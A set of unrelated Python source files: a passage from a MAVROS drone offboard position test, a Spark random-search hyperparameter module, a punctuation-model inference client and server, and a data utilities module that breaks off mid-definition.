self.pos_thread = Thread(target=self.send_pos, args=())
self.pos_thread.daemon = True
self.pos_thread.start()
#
# Helper method
#
def send_pos(self):
rate = rospy.Rate(20) #Hz
self.raw_point.header = Header()
self.raw_point.header.frame_id = "base_footprint"
while not rospy.is_shutdown():
self.raw_point.header.stamp = rospy.Time.now()
self.raw_point.coordinate_frame = 8
self.raw_point.type_mask = 3064 #1475
self.raw_setpoint_pb.publish(self.raw_point)
try:
rate.sleep()
except rospy.ROSException as e:
rospy.logerr(e)
def is_at_position(self, x, y, z, offset):
"""offset: meters"""
rospy.logdebug("current position | x:{0:.2f}, y:{1:.2f}, z:{2:.2f}".
format(self.local_position.pose.position.x, self.local_position.pose.position.y,
self.local_position.pose.position.z))
target_pos = np.array((x, y, z))
current_pos = np.array((self.local_position.pose.position.x,
self.local_position.pose.position.y,
self.local_position.pose.position.z))
return np.linalg.norm(target_pos - current_pos) < offset
def is_at_height(self, h, offset):
"""offset: meters"""
rospy.logdebug("current height | h:{0:.2f}".format(self.local_position.pose.position.z))
return h - self.local_position.pose.position.z < offset
def reach_position(self, x, y, z, timeout):
"""timeout(int): seconds"""
# set a position setpoint
self.raw_point.position.x = x
self.raw_point.position.y = y
self.raw_point.position.z = z
rospy.loginfo("attempting to reach position | x: {0}, y: {1}, z: {2} | current position x: {3:.2f}, y: {4:.2f}, z: {5:.2f}".
format(x, y, z, self.local_position.pose.position.x,
self.local_position.pose.position.y,
self.local_position.pose.position.z))
# does it reach the position in 'timeout' seconds?
loop_freq = 2 # Hz
rate = rospy.Rate(loop_freq)
# reached = False
for i in range(timeout*loop_freq):
if self.is_at_position(self.raw_point.position.x,
self.raw_point.position.y,
self.raw_point.position.z, self.radius):
rospy.loginfo("position reached | seconds: {0} of {1}".format(i/loop_freq, timeout))
# reached = True
break
try:
rate.sleep()
except rospy.ROSException as e:
rospy.logerr(e)
def swing_motion(self, vx, h, timeout):
"""timeout(int): seconds"""
rospy.loginfo("producing swing motion with velocity, at height | vx: {0:.2f}, h: {1:.2f}".format(vx, h))
loop_freq = 0.8
rate = rospy.Rate(loop_freq)
for i in range(int(timeout*loop_freq)):
self.raw_point.position.z = h
self.raw_point.velocity.x = vx
vx = -vx
try:
rate.sleep()
except rospy.ROSException as e:
rospy.logerr(e)
self.raw_point.velocity.x = 0
def test_swing_motion(self):
"""Test swing motion at a certain height"""
# make sure topics are ready
self.wait_for_topics(60)
self.wait_for_landed_state(mavutil.mavlink.MAV_LANDED_STATE_ON_GROUND, 10, -1)
self.log_topic_vars()
self.set_mode("OFFBOARD", 5)
self.set_arm(True, 5)
positions = [[0, 0, 1.7], [1, 0, 1.7], [0, 0, 1.7]]
# positions = [[0, 0, 1.7]]
# self.swing_motion(0., 2.0, 10)
for position in positions:
self.reach_position(position[0], position[1], position[2], 30)
self.set_mode("AUTO.LAND", 5)
self.wait_for_landed_state(mavutil.mavlink.MAV_LANDED_STATE_ON_GROUND, 45, 0)
self.set_arm(False, 5)
if __name__ == '__main__':
swing_act = MavrosOffboardPosctl()
swing_act.test_swing_motion()
|
random_search.py
|
"""
Random Search implementation
"""
from hops import util
from hops import hdfs as hopshdfs
from hops import tensorboard
from hops import devices
import pydoop.hdfs
import threading
import six
import datetime
import os
import random
run_id = 0
def _launch(sc, map_fun, args_dict, samples, direction='max', local_logdir=False, name="no-name"):
"""
    Args:
        sc: Spark context used to parallelize the hyperparameter trials
        map_fun: user training function; its argument names must match the keys of args_dict and it must return a numeric metric
        args_dict: dict mapping each hyperparameter name to a boundary list [lower_bound, upper_bound]
        samples: number of random hyperparameter combinations to draw
        direction: 'max' or 'min', the direction in which the returned metric is optimized
        local_logdir: whether TensorBoard logs are kept in the local log directory before being copied to HDFS
        name: name of the experiment
    Returns:
        (HDFS run directory, best hyperparameter combination, best metric value); see the sketch after this function
"""
global run_id
app_id = str(sc.applicationId)
arg_lists = list(args_dict.values())
for i in range(len(arg_lists)):
if len(arg_lists[i]) != 2:
raise ValueError('Boundary list must contain exactly two elements, [lower_bound, upper_bound] for each hyperparameter')
hp_names = args_dict.keys()
random_dict = {}
for hp in hp_names:
lower_bound = args_dict[hp][0]
upper_bound = args_dict[hp][1]
assert lower_bound < upper_bound, "lower bound: " + str(lower_bound) + " must be less than upper bound: " + str(upper_bound)
random_values = []
if type(lower_bound) == int and type(upper_bound) == int:
for i in range(samples):
random_values.append(random.randint(lower_bound, upper_bound))
elif type(lower_bound) == float and type(upper_bound) == float:
for i in range(samples):
random_values.append(random.uniform(lower_bound, upper_bound))
else:
            raise ValueError('Only float and int are currently supported')
random_dict[hp] = random_values
random_dict, new_samples = _remove_duplicates(random_dict, samples)
sc.setJobGroup("Random Search", "{} | Hyperparameter Optimization".format(name))
#Each TF task should be run on 1 executor
nodeRDD = sc.parallelize(range(new_samples), new_samples)
job_start = datetime.datetime.now()
nodeRDD.foreachPartition(_prepare_func(app_id, run_id, map_fun, random_dict, local_logdir))
job_end = datetime.datetime.now()
job_time_str = util._time_diff(job_start, job_end)
arg_count = six.get_function_code(map_fun).co_argcount
arg_names = six.get_function_code(map_fun).co_varnames
hdfs_appid_dir = hopshdfs._get_experiments_dir() + '/' + app_id
hdfs_runid_dir = _get_logdir(app_id)
max_val, max_hp, min_val, min_hp, avg = _get_best(random_dict, new_samples, arg_names, arg_count, hdfs_appid_dir, run_id)
param_combination = ""
best_val = ""
if direction == 'max':
param_combination = max_hp
best_val = str(max_val)
results = '\n------ Random Search results ------ direction(' + direction + ') \n' \
'BEST combination ' + max_hp + ' -- metric ' + str(max_val) + '\n' \
'WORST combination ' + min_hp + ' -- metric ' + str(min_val) + '\n' \
'AVERAGE metric -- ' + str(avg) + '\n' \
'Total job time ' + job_time_str + '\n'
_write_result(hdfs_runid_dir, results)
print(results)
elif direction == 'min':
param_combination = min_hp
best_val = str(min_val)
results = '\n------ Random Search results ------ direction(' + direction + ') \n' \
'BEST combination ' + min_hp + ' -- metric ' + str(min_val) + '\n' \
'WORST combination ' + max_hp + ' -- metric ' + str(max_val) + '\n' \
'AVERAGE metric -- ' + str(avg) + '\n' \
'Total job time ' + job_time_str + '\n'
_write_result(hdfs_runid_dir, results)
print(results)
print('Finished Experiment \n')
return hdfs_runid_dir, param_combination, best_val
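# Illustrative sketch (not part of the original module): how _launch expects its
# arguments. `sc` is an existing SparkContext and `train` is a user function whose
# argument names match the dict keys and which returns a single numeric metric;
# both names are placeholders.
#
#     def train(learning_rate, dropout):
#         ...
#         return accuracy
#
#     boundary_dict = {'learning_rate': [0.001, 0.1], 'dropout': [0.1, 0.5]}
#     logdir, best_params, best_metric = _launch(sc, train, boundary_dict,
#                                                samples=10, direction='max')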
def _remove_duplicates(random_dict, samples):
hp_names = random_dict.keys()
concatenated_hp_combs_arr = []
for index in range(samples):
separated_hp_comb = ""
for hp in hp_names:
separated_hp_comb = separated_hp_comb + str(random_dict[hp][index]) + "%"
concatenated_hp_combs_arr.append(separated_hp_comb)
entry_index = 0
indices_to_skip = []
for entry in concatenated_hp_combs_arr:
inner_index = 0
for possible_dup_entry in concatenated_hp_combs_arr:
if entry == possible_dup_entry and inner_index > entry_index:
indices_to_skip.append(inner_index)
inner_index = inner_index + 1
entry_index = entry_index + 1
indices_to_skip = list(set(indices_to_skip))
for hp in hp_names:
index = 0
pruned_duplicates_arr = []
for random_value in random_dict[hp]:
if index not in indices_to_skip:
pruned_duplicates_arr.append(random_value)
index = index + 1
random_dict[hp] = pruned_duplicates_arr
return random_dict, samples - len(indices_to_skip)
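# Worked example: with samples=3 and
#     random_dict = {'lr': [0.1, 0.1, 0.2], 'bs': [32, 32, 64]}
# the concatenated combinations are "0.1%32%", "0.1%32%" and "0.2%64%"; index 1
# duplicates index 0 and is pruned, so the function returns
#     ({'lr': [0.1, 0.2], 'bs': [32, 64]}, 2)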
def _get_logdir(app_id):
"""
Args:
app_id:
Returns:
"""
global run_id
return hopshdfs._get_experiments_dir() + '/' + app_id + '/random_search/run.' + str(run_id)
#Helper to put Spark required parameter iter in function signature
def _prepare_func(app_id, run_id, map_fun, args_dict, local_logdir):
"""
Args:
app_id:
run_id:
map_fun:
args_dict:
local_logdir:
Returns:
"""
def _wrapper_fun(iter):
"""
Args:
iter:
Returns:
"""
for i in iter:
executor_num = i
tb_pid = 0
tb_hdfs_path = ''
hdfs_exec_logdir = ''
t = threading.Thread(target=devices._print_periodic_gpu_utilization)
if devices.get_num_gpus() > 0:
t.start()
try:
#Arguments
if args_dict:
argcount = six.get_function_code(map_fun).co_argcount
names = six.get_function_code(map_fun).co_varnames
args = []
argIndex = 0
param_string = ''
while argcount > 0:
#Get args for executor and run function
param_name = names[argIndex]
param_val = args_dict[param_name][executor_num]
param_string += str(param_name) + '=' + str(param_val) + '.'
args.append(param_val)
argcount -= 1
argIndex += 1
param_string = param_string[:-1]
hdfs_exec_logdir, hdfs_appid_logdir = hopshdfs._create_directories(app_id, run_id, param_string, 'random_search')
pydoop.hdfs.dump('', os.environ['EXEC_LOGFILE'], user=hopshdfs.project_user())
hopshdfs._init_logger()
tb_hdfs_path, tb_pid = tensorboard._register(hdfs_exec_logdir, hdfs_appid_logdir, executor_num, local_logdir=local_logdir)
gpu_str = '\nChecking for GPUs in the environment' + devices._get_gpu_info()
hopshdfs.log(gpu_str)
print(gpu_str)
print('-------------------------------------------------------')
print('Started running task ' + param_string + '\n')
hopshdfs.log('Started running task ' + param_string)
task_start = datetime.datetime.now()
retval = map_fun(*args)
task_end = datetime.datetime.now()
_handle_return(retval, hdfs_exec_logdir)
time_str = 'Finished task ' + param_string + ' - took ' + util._time_diff(task_start, task_end)
print('\n' + time_str)
print('Returning metric ' + str(retval))
print('-------------------------------------------------------')
hopshdfs.log(time_str)
except:
#Always do cleanup
_cleanup(tb_hdfs_path)
if devices.get_num_gpus() > 0:
t.do_run = False
t.join(20)
raise
finally:
try:
if local_logdir:
local_tb = tensorboard.local_logdir_path
util._store_local_tensorboard(local_tb, hdfs_exec_logdir)
except:
pass
_cleanup(tb_hdfs_path)
if devices.get_num_gpus() > 0:
t.do_run = False
t.join(20)
return _wrapper_fun
def _cleanup(tb_hdfs_path):
"""
Args:
tb_hdfs_path:
Returns:
"""
global experiment_json
handle = hopshdfs.get()
    if tb_hdfs_path is not None and tb_hdfs_path != '' and handle.exists(tb_hdfs_path):
handle.delete(tb_hdfs_path)
hopshdfs._kill_logger()
def _handle_return(val, hdfs_exec_logdir):
"""
Args:
        val: value returned by the user's map function; must be convertible to a number
        hdfs_exec_logdir: HDFS log directory of the task, where the 'metric' file is written
Returns:
"""
try:
        int(val)  # validate that the returned value is numeric
except:
raise ValueError('Your function needs to return a metric (number) which should be maximized or minimized')
metric_file = hdfs_exec_logdir + '/metric'
fs_handle = hopshdfs.get_fs()
try:
fd = fs_handle.open_file(metric_file, mode='w')
except:
fd = fs_handle.open_file(metric_file, flags='w')
fd.write(str(float(val)).encode())
fd.flush()
fd.close()
def _get_best(args_dict, num_combinations, arg_names, arg_count, hdfs_appid_dir, run_id):
"""
Args:
args_dict:
num_combinations:
arg_names:
arg_count:
hdfs_appid_dir:
run_id:
Returns:
"""
max_hp = ''
max_val = ''
min_hp = ''
min_val = ''
results = []
first = True
for i in range(num_combinations):
argIndex = 0
param_string = ''
num_args = arg_count
while num_args > 0:
#Get args for executor and run function
param_name = arg_names[argIndex]
param_val = args_dict[param_name][i]
param_string += str(param_name) + '=' + str(param_val) + '.'
num_args -= 1
argIndex += 1
param_string = param_string[:-1]
path_to_metric = hdfs_appid_dir + '/random_search/run.' + str(run_id) + '/' + param_string + '/metric'
metric = None
with pydoop.hdfs.open(path_to_metric, "r") as fi:
metric = float(fi.read())
fi.close()
if first:
max_hp = param_string
max_val = metric
min_hp = param_string
min_val = metric
first = False
if metric > max_val:
max_val = metric
max_hp = param_string
if metric < min_val:
min_val = metric
min_hp = param_string
results.append(metric)
avg = sum(results)/float(len(results))
return max_val, max_hp, min_val, min_hp, avg
def _write_result(runid_dir, string):
"""
Args:
runid_dir:
string:
Returns:
"""
metric_file = runid_dir + '/summary'
fs_handle = hopshdfs.get_fs()
try:
fd = fs_handle.open_file(metric_file, mode='w')
except:
fd = fs_handle.open_file(metric_file, flags='w')
fd.write(string.encode())
fd.flush()
fd.close()
|
inference_interface.py
|
import logging
import multiprocessing as mp
import signal
import struct
import threading
from threading import Thread
from time import sleep
from typing import List, Tuple
from .inference_pipeline import InferenceServer
# from utils.utils import register_logger
logger = logging.getLogger(__name__)
# register_logger(logger)
class InferenceClient:
"""Inference client for communicating with punctuator server"""
def __init__(self, conn, check_interval=0.1) -> None:
self.conn = conn
self.check_interval = check_interval
def punctuation(self, inputs):
self.conn.send(inputs)
while True:
try:
if self.conn.poll(self.check_interval):
outputs = self.conn.recv()
return outputs
except (struct.error, OSError) as err:
                logger.warning(f"InferenceClient struct unpack error: {err}")
raise err
def terminate(self):
"""graceful shutdown everything"""
logger.info("terminate the client")
self.conn.close()
class Inference:
"""Interface for using the punctuator"""
def __init__(
self,
inference_args,
method="spawn",
server_check_interval=0.1,
task_check_interval=0.05,
verbose=False,
) -> None:
"""Inference class for using the punctuator
Args:
inference_args (InferenceArguments): inference arguments
method (str, optional): "fork" or "spawn". Defaults to "spawn".
server_check_interval (float, optional): interval to check punctuator running status. Defaults to 0.1.
task_check_interval (float, optional): interval to check new task. Defaults to 0.05.
            verbose (bool, optional): whether to output punctuation progress. Defaults to False.
"""
self.termination = mp.get_context(method).Event()
self.method = method
self.inference_args = inference_args
self.verbose = verbose
self.task_check_interval = task_check_interval
self._init_termination()
self._produce_server(task_check_interval)
self.thread = Thread(target=self._run, args=(server_check_interval,))
self.thread.start()
def _produce_server(self, task_check_interval):
logger.info("set up punctuator")
self.c_conn, self.s_conn = mp.Pipe(True)
server = InferenceServer(
inference_args=self.inference_args,
conn=self.s_conn,
termination=self.termination,
check_interval=task_check_interval,
verbose=self.verbose,
)
self.server_process = mp.get_context(self.method).Process(
target=server.run,
)
logger.info("start running punctuator")
self.server_process.start()
logger.info("start client")
self.client = InferenceClient(conn=self.c_conn)
def _init_termination(self):
"""init signal handler and termination event"""
self.shutdown = threading.Event()
signal.signal(signal.SIGTERM, self._terminate)
signal.signal(signal.SIGINT, self._terminate)
def _terminate(self, signum, frame):
"""graceful shutdown everything"""
logger.info(f"[{signum}] terminate inference: {frame}")
self.shutdown.set()
self.termination.set()
self.client.terminate()
def _run(self, check_interval):
while not self.shutdown.is_set():
if self.server_process.exitcode is not None:
logger.warning("punctuator is no longer working, restart")
self._produce_server(self.task_check_interval)
sleep(check_interval)
logger.info("terminate the punctuator")
# self.server_process.terminate()
def punctuation(self, inputs: List[str]) -> Tuple[List[str], List[List]]:
"""Do punctuation of inputs
Args:
            inputs (List[str]): list of plain, unpunctuated texts
        Returns:
            Tuple[List[str], List[List]]: tuple of outputs;
                the first element is the list of punctuated texts,
                the second is the corresponding list of label sequences
"""
try:
outputs_tuple = self.client.punctuation(inputs)
return outputs_tuple
except Exception as err:
logger.error(f"error doing punctuation with details {str(err)}")
return None
def terminate(self):
self.shutdown.set()
self.termination.set()
self.client.terminate()
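# Illustrative usage sketch (not part of the original module); `inference_args`
# stands in for a configured InferenceArguments instance:
#
#     inference = Inference(inference_args=inference_args)
#     result = inference.punctuation(["how are you i am fine"])
#     if result is not None:
#         texts, labels = result
#     inference.terminate()
#
# punctuation() returns None when the underlying server call fails, so the
# result is checked before unpacking.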
|
utils.py
|
import os
import os.path
import io
import tempfile
import json as js
import re
from itertools import tee
from functools import wraps
import functools as ft
import threading
from urllib.parse import urlparse as parse_url
from urllib.parse import parse_qs
import numpy as np
import keyword
import uuid
from .bitmap import bitmap
from ..core import aio
try:
import collections.abc as collections_abc # only works on python 3.3+
except ImportError:
import collections as collections_abc
from multiprocessing import Process
from pandas.io.common import is_url
import requests
import s3fs
import stat as st
integer_types = (int, np.integer)
def is_int(n):
return isinstance(n, integer_types)
def is_str(s):
return isinstance(s, str)
def is_slice(s):
return isinstance(s, slice)
def is_iterable(it):
return isinstance(it, collections_abc.Iterable)
def is_iter_str(it):
if not is_iterable(it):
return False
for s in it:
if not is_str(s):
return False
return True
def len_none(item):
return 0 if item is None else len(item)
def pairwise(iterator):
a, b = tee(iterator)
next(b, None)
return zip(a, b)
def is_sorted(iterator, compare=None):
if compare is None:
def compare(a, b):
return a <= b
return all(compare(a, b) for a, b in pairwise(iterator))
def remove_nan(d):
if isinstance(d, float) and np.isnan(d):
return None
if isinstance(d, list):
for i, v in enumerate(d):
if isinstance(v, float) and np.isnan(v):
d[i] = None
else:
remove_nan(v)
elif isinstance(d, collections_abc.Mapping):
for k, v in d.items():
if isinstance(v, float) and np.isnan(v):
d[k] = None
else:
remove_nan(v)
return d
def find_nan_etc(d):
if isinstance(d, float) and np.isnan(d):
return None
if isinstance(d, np.integer):
print('numpy int: %s' % (d))
return int(d)
if isinstance(d, np.bool_):
return bool(d)
if isinstance(d, np.ndarray):
print('numpy array: %s' % (d))
if isinstance(d, list):
for i, v in enumerate(d):
if isinstance(v, float) and np.isnan(v):
print('numpy nan at %d in: %s' % (i, d))
elif isinstance(v, np.integer):
print('numpy int: %s at %d in %s' % (v, i, d))
elif isinstance(v, np.bool_):
print('numpy bool: %d in %s' % (i, d))
elif isinstance(v, np.ndarray):
print('numpy array: %d in %s' % (i, d))
else:
find_nan_etc(v)
elif isinstance(d, collections_abc.Mapping):
for k, v in d.items():
if isinstance(v, float) and np.isnan(v):
print('numpy nan at %s in: %s' % (k, d))
elif isinstance(v, np.integer):
print('numpy int: %s in %s' % (k, d))
elif isinstance(v, np.bool_):
print('numpy bool: %s in %s' % (k, d))
elif isinstance(v, np.ndarray):
print('numpy array: %s in %s' % (k, d))
else:
find_nan_etc(v)
def remove_nan_etc(d):
if isinstance(d, float) and np.isnan(d):
return None
if isinstance(d, np.integer):
return int(d)
if isinstance(d, np.bool_):
return bool(d)
if isinstance(d, list):
for i, v in enumerate(d):
if isinstance(v, float) and np.isnan(v):
d[i] = None
elif isinstance(v, np.integer):
d[i] = int(v)
elif isinstance(v, np.bool_):
d[i] = bool(v)
else:
d[i] = remove_nan_etc(v)
elif isinstance(d, collections_abc.Mapping):
for k, v in d.items():
if isinstance(v, float) and np.isnan(v):
d[k] = None
elif isinstance(v, np.integer):
d[k] = int(v)
elif isinstance(v, np.bool_):
d[k] = bool(v)
elif isinstance(v, np.ndarray):
d[k] = remove_nan_etc(v.tolist())
else:
d[k] = remove_nan_etc(v)
return d
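# Example: remove_nan_etc({'a': float('nan'), 'b': [np.int64(1), float('nan')]})
# returns {'a': None, 'b': [1, None]}, converting NaNs to None and numpy scalars
# to plain Python types, mutating containers in place.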
class AttributeDict(object):
def __init__(self, d):
self.d = d
def __getattr__(self, attr):
return self.__dict__['d'][attr]
def __getitem__(self, key):
return self.__getattribute__('d')[key]
def __dir__(self):
return list(self.__getattribute__('d').keys())
ID_RE = re.compile(r'[_A-Za-z][_a-zA-Z0-9]*')
def is_valid_identifier(s):
m = ID_RE.match(s)
return bool(m and m.end(0) == len(s) and
not keyword.iskeyword(s))
def fix_identifier(c):
m = ID_RE.match(c)
if m is None:
c = '_' + c
m = ID_RE.match(c)
while m.end(0) != len(c):
c = c[:m.end(0)] + '_' + c[m.end(0)+1:]
m = ID_RE.match(c)
return c
def gen_columns(n):
return ["_"+str(i) for i in range(1, n+1)]
def type_fullname(o):
module = o.__class__.__module__
if module is None or module == str.__class__.__module__:
return o.__class__.__name__
return module + '.' + o.__class__.__name__
def indices_len(ind):
if isinstance(ind, slice):
if ind.step is None or ind.step == 1:
return ind.stop-ind.start
else:
return len(range(*ind.indices(ind.stop)))
if ind is None:
return 0
return len(ind)
def fix_loc(indices):
if isinstance(indices, slice):
return slice(indices.start, indices.stop-1) # semantic of slice .loc
return indices
# See http://graphics.stanford.edu/~seander/bithacks.html#RoundUpPowerOf2Float
def next_pow2(v):
v -= 1
v |= v >> 1
v |= v >> 2
v |= v >> 4
v |= v >> 8
v |= v >> 16
v |= v >> 32
return v+1
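# Examples: next_pow2(1) == 1, next_pow2(5) == 8, next_pow2(64) == 64,
# next_pow2(100) == 128. The extra `v >> 32` step extends the classic 32-bit
# bit-smearing trick to 64-bit inputs.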
def indices_to_slice(indices):
if len(indices) == 0:
return slice(0, 0)
s = e = None
for i in indices:
if s is None:
s = e = i
elif i == e or i == e+1:
e = i
else:
return indices # not sliceable
return slice(s, e+1)
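# Examples: indices_to_slice([3, 4, 5, 6]) == slice(3, 7);
# indices_to_slice([3, 5, 6]) returns the input unchanged because the run is not
# contiguous; indices_to_slice([]) == slice(0, 0).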
def _first_slice(indices):
# assert isinstance(indices, bitmap)
ei = enumerate(indices, indices[0])
mask = np.equal(*zip(*ei))
arr = np.array(indices)
head = arr[mask]
tail = arr[len(head):]
return head, tail
def iter_to_slices(indices, fix_loc=False):
tail = np.sort(indices)
last = tail[-1]
incr = 0 if fix_loc else 1
slices = []
while len(tail):
head, tail = _first_slice(tail)
stop = head[-1]+incr if head[-1] < last else None
slices.append(slice(head[0], stop, 1))
return slices
def norm_slice(sl, fix_loc=False, stop=None):
if (sl.start is not None and sl.step == 1):
return sl
start = 0 if sl.start is None else sl.start
step = 1 if sl.step is None else sl.step
if stop is None:
stop = sl.stop
if fix_loc:
assert stop is not None
stop += 1
    return slice(start, stop, step)
def is_full_slice(sl):
if not isinstance(sl, slice):
return False
nsl = norm_slice(sl)
return nsl.start == 0 and nsl.step == 1 and nsl.stop is None
def inter_slice(this, that):
bz = bitmap([])
if this is None:
return bz, bz, norm_slice(that)
if that is None:
return norm_slice(this), bz, bz
if isinstance(this, slice) and isinstance(that, slice):
this = norm_slice(this)
that = norm_slice(that)
if this == that:
return bz, this, bz
        if this.step == 1 and that.step == 1:
if this.start >= that.start and this.stop <= that.stop:
return bz, this, bitmap(that)-bitmap(this)
if that.start >= this.start and that.stop <= this.stop:
return bitmap(this)-bitmap(that), that, bz
if this.stop <= that.start or that.stop <= this.start:
return this, bz, that
if this.start < that.start:
left = this
right = that
else:
left = that
right = this
common_ = slice(max(left.start, right.start),
min(left.stop, right.stop), 1)
only_left = slice(left.start, common_.start)
only_right = slice(common_.stop, right.stop)
if left == this:
return only_left, common_, only_right
else:
return only_right, common_, only_left
# else: # TODO: can we improve it when step >1 ?
else:
if not isinstance(this, bitmap):
this = bitmap(this)
if not isinstance(that, bitmap):
that = bitmap(that)
common_ = this & that
only_this = this - that
only_that = that - this
return only_this, common_, only_that
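# Example: inter_slice(slice(0, 10), slice(5, 15)) returns
# (slice(0, 5), slice(5, 10, 1), slice(10, 15)), i.e. indices only in the first
# argument, indices shared by both, and indices only in the second; non step-1
# inputs fall back to bitmap set arithmetic.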
def slice_to_array(sl):
if isinstance(sl, slice):
# return bitmap(range(*sl.indices(sl.stop)))
return bitmap(sl)
return sl
def slice_to_bitmap(sl, stop=None):
stop = sl.stop if stop is None else stop
assert is_int(stop)
return bitmap(range(*sl.indices(stop)))
def slice_to_arange(sl):
if isinstance(sl, slice):
assert is_int(sl.stop)
return np.arange(*sl.indices(sl.stop))
if isinstance(sl, np.ndarray):
return sl
return np.array(sl)
def get_random_name(prefix):
return prefix+str(uuid.uuid4()).split('-')[-1]
def all_string(it):
return all([isinstance(elt, str) for elt in it])
def all_int(it):
return all([isinstance(elt, integer_types) for elt in it])
def all_string_or_int(it):
return all_string(it) or all_int(it)
def all_bool(it):
if hasattr(it, 'dtype'):
return it.dtype == bool
return all([isinstance(elt, bool) for elt in it])
def are_instances(it, type_):
if hasattr(it, 'dtype'):
        return it.dtype in type_ if isinstance(type_, tuple) else\
            it.dtype == type_
return all([isinstance(elt, type_) for elt in it])
def is_fancy(key):
return (isinstance(key, np.ndarray) and key.dtype == np.int64) or \
isinstance(key, collections_abc.Iterable)
def fancy_to_mask(indexes, array_shape, mask=None):
if mask is None:
        mask = np.zeros(array_shape, dtype=bool)
else:
mask.fill(0)
mask[indexes] = True
return mask
def mask_to_fancy(mask):
return np.where(mask)
def is_none_alike(x):
if isinstance(x, slice) and x == slice(None, None, None):
return True
return x is None
def are_none(*args):
for e in args:
if e is not None:
return False
return True
class RandomBytesIO(object):
def __init__(self, cols=1, size=None, rows=None, **kwargs):
self._pos = 0
self._reminder = ""
self._cols = cols
if size is not None and rows is not None:
raise ValueError("'size' and 'rows' "
"can not be supplied simultaneously")
self._generator = self.get_row_generator(**kwargs)
self._yield_size = len(next(self._generator))
if size is not None:
rem = size % self._yield_size
if rem:
self._size = size - rem + self._yield_size
self._rows = size // self._yield_size + 1
else:
self._size = size
self._rows = size // self._yield_size
elif rows is not None:
self._rows = rows
self._size = rows * self._yield_size
else:
raise ValueError("One of 'size' and 'rows' "
"must be supplied (put 0 "
"for an infinite loop)")
# WARNING: the choice of the mask must guarantee a fixed size for the rows
def get_row_generator(self, mask='{: 8.7e}',
loc=0.5, scale=0.8, seed=1234):
row_mask = ','.join([mask]*self._cols)+'\n'
np.random.seed(seed=seed)
while True:
yield row_mask.format(*np.random.normal(loc=loc, scale=scale,
size=self._cols))
def read(self, n=0):
if n == 0:
n = self._size
if self._pos > self._size - 1:
return b''
if self._pos + n > self._size:
n = self._size - self._pos
self._pos += n
if n == len(self._reminder):
ret = self._reminder
self._reminder = ""
return ret.encode('utf-8')
if n < len(self._reminder):
ret = self._reminder[:n]
self._reminder = self._reminder[n:]
return ret.encode('utf-8')
# n > len(self._reminder)
n2 = n - len(self._reminder)
rem = n2 % self._yield_size
n_yield = n2 // self._yield_size
if rem:
n_yield += 1
s = "".join([elt for _, elt in zip(range(n_yield), self._generator)])
raw_str = self._reminder + s
ret = raw_str[:n]
self._reminder = raw_str[n:]
return ret.encode('utf-8')
def tell(self):
return self._pos
def size(self):
return self._size
def __iter__(self):
return self
def __next__(self):
if self._reminder:
ret = self._reminder
self._reminder = ''
self._pos += len(ret)
return ret
if self._pos + self._yield_size > self._size:
raise StopIteration
self._pos += self._yield_size
return next(self._generator)
# def next(self):
# return self.__next__()
def readline(self):
try:
return self.__next__()
except StopIteration:
return ''
def readlines(self):
return list(self)
def save(self, file_name, force=False):
if os.path.exists(file_name) and not force:
raise ValueError("File {} already exists!".format(file_name))
with open(file_name, 'wb') as fd:
for row in self:
fd.write(bytes(row, encoding='ascii'))
def __str__(self):
return "<{} cols={}, rows={} bytes={}>".format(type(self), self._cols,
self._rows, self._size)
def __repr__(self):
return self.__str__()
def _make_csv_fifo_impl(rand_io, file_name):
rand_io.save(file_name, force=True)
def make_csv_fifo(rand_io, file_name=None):
if file_name is None:
dir_name = tempfile.mkdtemp(prefix='p10s_rand_')
file_name = os.path.join(dir_name, 'buffer.csv')
elif os.path.exists(file_name):
raise ValueError("File {} already exists!".format(file_name))
os.mkfifo(file_name)
p = Process(target=_make_csv_fifo_impl, args=(rand_io, file_name))
p.start()
return file_name
def del_tmp_csv_fifo(file_name):
if not file_name.startswith('/tmp/p10s_rand_'):
raise ValueError("Not in /tmp/p10s_rand_... {}".format(file_name))
mode = os.stat(file_name).st_mode
if not st.S_ISFIFO(mode):
raise ValueError("Not a FIFO {}".format(file_name))
dn = os.path.dirname(file_name)
os.remove(file_name)
os.rmdir(dn)
def is_s3_url(url) -> bool:
"""Check for an s3, s3n, or s3a url"""
if not isinstance(url, str):
return False
return parse_url(url).scheme in ["s3", "s3n", "s3a"]
def _is_buffer_url(url):
res = parse_url(url)
return res.scheme == 'buffer'
def _url_to_buffer(url):
res = parse_url(url)
if res.scheme != 'buffer':
raise ValueError("Wrong buffer url: {}".format(url))
dict_ = parse_qs(res.query, strict_parsing=1)
kwargs = dict([(k, int(e[0])) for (k, e) in dict_.items()])
return RandomBytesIO(**kwargs)
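# Example: a "buffer://" URL encodes RandomBytesIO constructor arguments as query
# parameters, so _url_to_buffer('buffer://?cols=3&rows=100') builds
# RandomBytesIO(cols=3, rows=100), an in-memory source of 100 synthetic CSV rows
# with 3 columns each.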
#
# from pandas-dev: _strip_schema, s3_get_filepath_or_buffer
#
def _strip_schema(url):
"""Returns the url without the s3:// part"""
result = parse_url(url)
return result.netloc + result.path
def s3_get_filepath_or_buffer(filepath_or_buffer, encoding=None,
compression=None):
# pylint: disable=unused-argument
fs = s3fs.S3FileSystem(anon=False)
from botocore.exceptions import NoCredentialsError
try:
filepath_or_buffer = fs.open(_strip_schema(filepath_or_buffer))
except (OSError, NoCredentialsError):
# boto3 has troubles when trying to access a public file
# when credentialed...
# An OSError is raised if you have credentials, but they
# aren't valid for that bucket.
# A NoCredentialsError is raised if you don't have creds
# for that bucket.
fs = s3fs.S3FileSystem(anon=True)
filepath_or_buffer = fs.open(_strip_schema(filepath_or_buffer))
return filepath_or_buffer, None, compression
def filepath_to_buffer(filepath, encoding=None,
compression=None, timeout=None, start_byte=0):
if not is_str(filepath):
# if start_byte:
# filepath.seek(start_byte)
return filepath, encoding, compression, filepath.size()
if is_url(filepath):
headers = None
if start_byte:
headers = {"Range": "bytes={}-".format(start_byte)}
req = requests.get(filepath, stream=True, headers=headers,
timeout=timeout)
content_encoding = req.headers.get('Content-Encoding', None)
if content_encoding == 'gzip':
compression = 'gzip'
size = req.headers.get('Content-Length', 0)
# return HttpDesc(req.raw, filepath), encoding, compression, int(size)
return req.raw, encoding, compression, int(size)
if is_s3_url(filepath):
reader, encoding, compression = s3_get_filepath_or_buffer(
filepath,
encoding=encoding,
compression=compression)
return reader, encoding, compression, reader.size
if _is_buffer_url(filepath):
buffer = _url_to_buffer(filepath)
return buffer, encoding, compression, buffer.size()
filepath = os.path.expanduser(filepath)
if not os.path.exists(filepath):
raise ValueError("wrong filepath: {}".format(filepath))
size = os.stat(filepath).st_size
stream = io.FileIO(filepath)
if start_byte:
stream.seek(start_byte)
return stream, encoding, compression, size
_compression_to_extension = {
'gzip': '.gz',
